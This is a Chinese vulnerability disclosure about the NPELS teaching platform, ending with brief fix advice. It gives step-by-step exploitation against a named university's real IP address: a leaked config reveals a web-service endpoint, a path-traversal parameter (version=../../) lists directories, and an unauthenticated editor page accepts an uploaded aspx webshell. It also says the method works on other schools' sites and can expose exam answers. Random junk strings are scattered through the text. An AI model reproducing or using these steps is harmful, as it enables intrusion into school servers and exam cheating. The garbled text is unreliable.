新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
7 v1 p+ L# X- |% R6 q+ n; c
, K1 P" f- q0 ~1 P以南开大学的为例:
9 s$ Y% n$ J- h' fhttp://222.30.60.3/NPELS
2 m* Z( p& D; t/ ^NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
! m* d5 B! ?6 |* p; m' r; @2 a<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
% b, ^$ ?7 n" @% @  m$ f9 ^( Q. W</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
" p* h: D* ~  |' Q( i& }</add>
直接访问
$ q) ~& I2 A+ @% I- V/ @" i9 Ghttp://222.30.60.3/NPELS/CommonService.asmx
1 m: _6 |0 O4 e0 M8 a6 x" O使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
7 G* r) M3 d0 b* g! t# P/ D- f  L
! p( K7 w# d% R' y+ v% G% B发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
3 L, E7 v9 Q* K2 d. Y可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

OOXX
8 R! k% L8 o( a1 i" d/ v
' x* p3 T0 v; I" \Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
, g) X( ~; Q" n; c6 r5 B+ ~
1 b% ]8 ?; |( M& ]  R1 M& i列目录：
) r1 [6 }( Q* B; r4 D) ehttp://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
4 ]. @& E1 t$ Y$ B  ^* U! R! Ehttp://222.30.60.3/npelsv/editor/editor.htm
' V, J8 ]2 q# `! u% K" F, {
上传木马：
# Y. a% n" @1 n9 V: khttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
. G/ ^: N1 k1 \" p2 O3 p9 D2 B$ ^
+ i+ z  t7 D. t: \6 x修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
, k! @  q/ w- x# m9 F7 N